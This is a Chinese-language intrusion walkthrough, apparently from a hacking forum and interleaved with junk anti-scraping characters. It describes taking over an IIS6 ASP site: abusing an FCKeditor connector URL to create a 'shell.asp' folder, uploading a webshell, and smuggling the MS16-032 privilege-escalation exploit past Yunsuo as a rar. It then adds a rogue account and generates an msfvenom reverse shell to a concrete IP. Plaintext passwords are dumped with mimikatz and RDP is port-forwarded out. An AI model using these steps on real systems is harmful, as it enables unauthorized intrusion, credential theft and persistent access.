|
\" s6 s, f( G5 i! J. q) G N
' d9 _$ L4 e! b0 _) I
4 _1 R: O/ R# `0 F+ @' W: R; \ " j& M4 H w: Y5 E% W
| 6 R6 o; Q8 b6 L) }# I0 m
( _3 _6 L" H2 j+ a* x6 h# V
$ N0 r# t! G; @* m' h一、 利用getwebshell篇 3 [5 a7 w. i7 U. K& l
3 }% @' E0 R, s) M/ O0 g
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: ) D3 x" G3 D0 w" ^. W6 l/ N- W$ [

* g A+ ~) l3 D# ^: U
) F/ U. w3 y8 r1 {% Q9 v( d下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
+ ?8 N1 i( v t5 q 8 h9 {- V6 s8 ~- _$ ]
下面我们构造一个asp目录,如: k" U0 e1 V3 {/ i
! H% u. V, a. A
. U) K! D% l4 L+ F' {4 W7 l http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
: e5 G8 @% o2 `6 d9 C
" Q A3 G: L' d& j k% U % f! [. u1 X# H- g- U; y# Y: X, ^
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 3 |! Q' K1 E" j7 L8 r1 ?0 ~3 ]. y( P
( L, Z0 t+ N, a
一、 绕过安全狗云锁提权并且加账号
1 D5 k! R3 _8 O& {; e7 L : Q+ p% i' `; n8 J% E: q+ `4 I
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干 8 T4 w1 U5 b: j0 s0 x' i
6 j- x# b8 [, R. U; [5 T
如图:
r) n' F# {: F% @. `3 H& b , G, L$ B4 x6 U U
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit % z6 b9 m" _6 y# k. C5 l+ @& n
5 w% ?2 O- E# T3 L% w
一、 利用metasploit
' i) p! g2 A5 t) t, f& ]8 @. x
; D. j$ c, ]% e( Y首先用pentestbox生成一个64位的payload如下命令
2 c% ^+ H% g/ L
& q+ t9 L2 z g( d1 t2 B8 E3 Y9 n: amsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe : G! F( N$ D7 J0 ?0 A* K
8 r+ e6 |% M3 Y7 i1 {为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
* [0 x3 l$ ~3 A. [) ]; O r / g$ W I+ Y7 n" U1 O: F
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
1 r, q" C' Q8 p& f+ W* s6 l; ~
! v; C1 S. N2 n" l1 D H* c6 r# o* }" C下面我们来做一个监听如下命令:
( d; w6 B, \1 X4 g S" e
( i( Q0 F& P9 l' \1 ^portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
6 ~7 q0 j9 v5 {. B4 E8 |+ n 0 e& R9 ]8 j& X3 T1 q$ {* S
9 c- ]2 l' t v7 Y R5 M, i$ O
| ' Z8 [- s$ u- @8 j3 w5 I S
, j& a/ b0 j) s0 P: V& e
, ]; R/ i+ S) b4 u
* O: [ T9 }& r5 p- M# P, o% D9 u8 E2 c: F9 f% f3 f3 @
. t* ?( `! l' P9 f) d0 ]
/ G1 w+ |0 I+ A( w
6 U7 W+ Y5 _2 o" D7 f4 n " C" E% g* }3 E! C( v+ A
0 o. F! \$ M0 v1 Z $ n% _! D/ g+ i+ G/ C% J. m
% d) W( f1 m( u0 @/ i
( X$ c3 K6 P( L- k4 t2 a
$ s& y, v! I" }- y
|